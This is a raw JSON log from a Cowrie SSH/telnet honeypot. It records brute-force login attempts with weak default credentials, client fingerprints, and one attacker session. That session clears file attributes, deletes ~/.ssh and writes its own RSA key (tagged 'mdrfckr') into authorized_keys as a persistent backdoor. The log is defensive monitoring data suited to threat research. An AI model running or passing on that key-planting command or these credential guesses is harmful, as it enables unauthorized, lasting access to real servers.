{"eventid":"cowrie.login.failed","username":"mysql","password":"12345","message":"login attempt [mysql/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:01:43.387644Z","src_ip":"212.227.235.229","session":"8bc21f9fa786"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:45.181323Z","src_ip":"212.227.235.229","session":"8bc21f9fa786"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46308,"dst_ip":"1.2.3.4","dst_port":22,"session":"d13695dc2e35","protocol":"ssh","message":"New connection: 212.227.125.160:46308 (1.2.3.4:22) [session: d13695dc2e35]","sensor":"my-vps","timestamp":"2025-08-31T04:01:57.771907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:01:58.380642Z","src_ip":"212.227.125.160","session":"d13695dc2e35"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:01:58.413857Z","src_ip":"212.227.125.160","session":"d13695dc2e35"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"12345","message":"login attempt [mysql/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:02:00.877206Z","src_ip":"212.227.125.160","session":"d13695dc2e35"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:02.485271Z","src_ip":"212.227.125.160","session":"d13695dc2e35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10290,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0eb143f8464","protocol":"ssh","message":"New connection: 212.227.235.229:10290 (1.2.3.4:22) [session: f0eb143f8464]","sensor":"my-vps","timestamp":"2025-08-31T04:02:09.697735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:02:09.699160Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:02:09.949946Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.login.success","username":"root","password":"server@23","message":"login attempt [root/server@23] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:02:10.982690Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.session.connect","src_ip":"5.181.187.146","src_port":41113,"dst_ip":"1.2.3.4","dst_port":23,"session":"f96f14a0d161","protocol":"telnet","message":"New connection: 5.181.187.146:41113 (1.2.3.4:23) [session: f96f14a0d161]","sensor":"my-vps","timestamp":"2025-08-31T04:02:11.038527Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:02:12.086622Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:02:12.087368Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:02:12.088290Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:12.338403Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:02:12.893016Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:02:12.893725Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:02:13.144035Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:13.144916Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10282,"dst_ip":"1.2.3.4","dst_port":22,"session":"335069dc2de5","protocol":"ssh","message":"New connection: 212.227.235.229:10282 (1.2.3.4:22) [session: 335069dc2de5]","sensor":"my-vps","timestamp":"2025-08-31T04:02:13.391454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:02:13.392176Z","src_ip":"212.227.235.229","session":"335069dc2de5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:02:13.642138Z","src_ip":"212.227.235.229","session":"335069dc2de5"}
{"eventid":"cowrie.session.closed","duration":"31.1","message":"Connection lost after 31.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:14.022131Z","src_ip":"212.227.125.160","session":"1d9047bd8d71"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:02:14.716179Z","src_ip":"212.227.235.229","session":"335069dc2de5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22893,"dst_ip":"1.2.3.4","dst_port":22,"session":"027feb0563b6","protocol":"ssh","message":"New connection: 212.227.235.229:22893 (1.2.3.4:22) [session: 027feb0563b6]","sensor":"my-vps","timestamp":"2025-08-31T04:02:16.857748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:02:16.858799Z","src_ip":"212.227.235.229","session":"027feb0563b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:02:17.108865Z","src_ip":"212.227.235.229","session":"027feb0563b6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:02:18.839426Z","src_ip":"212.227.235.229","session":"027feb0563b6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:19.097573Z","src_ip":"212.227.235.229","session":"027feb0563b6"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-31T04:02:19.761818Z","src_ip":"212.227.125.160","session":"63992e65a53a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48900,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e4e2fbdb836","protocol":"ssh","message":"New connection: 212.227.235.229:48900 (1.2.3.4:22) [session: 3e4e2fbdb836]","sensor":"my-vps","timestamp":"2025-08-31T04:02:23.767679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:02:23.768443Z","src_ip":"212.227.235.229","session":"3e4e2fbdb836"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:02:24.096683Z","src_ip":"212.227.235.229","session":"3e4e2fbdb836"}
{"eventid":"cowrie.login.failed","username":"shqk023","password":"shqk023","message":"login attempt [shqk023/shqk023] failed","sensor":"my-vps","timestamp":"2025-08-31T04:02:25.713286Z","src_ip":"212.227.235.229","session":"3e4e2fbdb836"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:27.041420Z","src_ip":"212.227.235.229","session":"3e4e2fbdb836"}
{"eventid":"cowrie.session.closed","duration":22.026208639144897,"message":"Connection lost after 22 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:33.064670Z","src_ip":"5.181.187.146","session":"f96f14a0d161"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35820,"dst_ip":"1.2.3.4","dst_port":22,"session":"be5e9d425ffa","protocol":"ssh","message":"New connection: 212.227.235.229:35820 (1.2.3.4:22) [session: be5e9d425ffa]","sensor":"my-vps","timestamp":"2025-08-31T04:02:35.926142Z"}
{"eventid":"cowrie.session.closed","duration":"102.0","message":"Connection lost after 102.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:36.024359Z","src_ip":"212.227.125.160","session":"63992e65a53a"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-31T04:02:36.716144Z","src_ip":"212.227.235.229","session":"074c17972a4e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:02:36.766520Z","src_ip":"212.227.235.229","session":"be5e9d425ffa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:02:36.767260Z","src_ip":"212.227.235.229","session":"be5e9d425ffa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39616,"dst_ip":"1.2.3.4","dst_port":23,"session":"38505e77b60d","protocol":"telnet","message":"New connection: 212.227.235.229:39616 (1.2.3.4:23) [session: 38505e77b60d]","sensor":"my-vps","timestamp":"2025-08-31T04:02:42.797716Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1234567","message":"login attempt [mysql/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:02:42.877380Z","src_ip":"212.227.235.229","session":"be5e9d425ffa"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:02:42.983923Z","src_ip":"212.227.235.229","session":"38505e77b60d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:02:43.422998Z","src_ip":"212.227.235.229","session":"38505e77b60d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43772,"dst_ip":"1.2.3.4","dst_port":22,"session":"77962a9a98e4","protocol":"ssh","message":"New connection: 212.227.235.229:43772 (1.2.3.4:22) [session: 77962a9a98e4]","sensor":"my-vps","timestamp":"2025-08-31T04:02:43.481343Z"}
{"eventid":"cowrie.session.closed","duration":"92.3","message":"Connection lost after 92.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:43.494625Z","src_ip":"212.227.235.229","session":"074c17972a4e"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:44.747693Z","src_ip":"212.227.235.229","session":"be5e9d425ffa"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52562,"dst_ip":"1.2.3.4","dst_port":22,"session":"b873a5ff99d8","protocol":"ssh","message":"New connection: 217.72.205.35:52562 (1.2.3.4:22) [session: b873a5ff99d8]","sensor":"my-vps","timestamp":"2025-08-31T04:02:45.509505Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:02:45.510564Z","src_ip":"217.72.205.35","session":"b873a5ff99d8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:02:48.021897Z","src_ip":"212.227.235.229","session":"77962a9a98e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:02:48.022928Z","src_ip":"212.227.235.229","session":"77962a9a98e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53972,"dst_ip":"1.2.3.4","dst_port":22,"session":"b95af466fff3","protocol":"ssh","message":"New connection: 212.227.125.160:53972 (1.2.3.4:22) [session: b95af466fff3]","sensor":"my-vps","timestamp":"2025-08-31T04:02:57.252896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:02:57.901761Z","src_ip":"212.227.125.160","session":"b95af466fff3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 